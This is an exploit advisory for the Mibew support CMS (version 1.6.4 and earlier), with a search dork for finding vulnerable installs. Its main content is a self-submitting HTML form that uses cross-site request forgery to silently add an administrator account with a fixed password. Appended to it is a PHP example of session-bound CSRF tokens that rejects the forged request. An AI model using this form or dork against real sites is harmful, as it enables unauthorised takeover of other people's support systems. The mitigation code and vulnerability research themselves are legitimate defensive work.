Mibew <= 1.6.4 CSRF Add Admin exploit


# Version 1.6.4
# Dork: intext:"(c) 2011-2013 mibew.org"

Introduction
------------

Mibew is an open-source support system CMS that can be easily incorporated into any website.

Exploit
-------

<body onload="document.forms[0].submit();">
    <form name="agentForm" method="post" action="http://pentest.lan/webim/operator/operator.php">
        <input name="opid" value="" type="hidden">
        <input name="login" size="40" value="r00t" class="formauth" type="hidden">
        <input name="email" size="40" value="r00t@t00r.tr" class="formauth" type="hidden">
        <input name="password" size="40" value="123456" class="formauth" type="hidden">
        <input name="passwordConfirm" size="40" value="123456" class="formauth" type="hidden">
        <input name="name" size="40" value="r00t" class="formauth" type="hidden">
        <input name="commonname" size="40" value="ruts" class="formauth" type="hidden">
    </form>
</body>

Groucho
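
A server-side mitigation for the form above, as an added example that is not part of the original advisory and not Mibew's own code: the handler accepts a state-changing POST only when it carries a token bound to the operator's session. The function names and the csrf_token field are assumptions; the other field names are the ones in the form above.

```php
<?php
declare(strict_types=1);
// Added example, not Mibew code. Function names and the "csrf_token" field
// are hypothetical; the remaining field names come from the form above.

// Create the per-session token once and return it.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random value
    }
    return $session['csrf_token'];
}

// Hidden field the application emits inside <form name="agentForm">.
function csrf_hidden_field(array &$session): string
{
    $token = htmlspecialchars(csrf_issue_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

// True only when the POST body carries the token stored in this session.
function csrf_request_is_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed demo: a simulated operator session and two POST bodies.
$session = [];
csrf_hidden_field($session); // rendering the real form issues the token

// Body sent by the cross-site form: the third-party page cannot read the token.
$forged = ['opid' => '', 'login' => 'r00t', 'password' => '123456',
           'passwordConfirm' => '123456'];
// Body sent from the application's own page, which embedded the token.
$legit = $forged + ['csrf_token' => $session['csrf_token']];

foreach (['forged' => $forged, 'legit' => $legit] as $label => $post) {
    $verdict = csrf_request_is_valid($session, $post) ? 'accepted' : 'rejected (403)';
    echo $label, ': ', $verdict, PHP_EOL;
}
```

In a real handler the check runs before any POST to operator.php is processed, and a failed check ends the request with HTTP 403.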

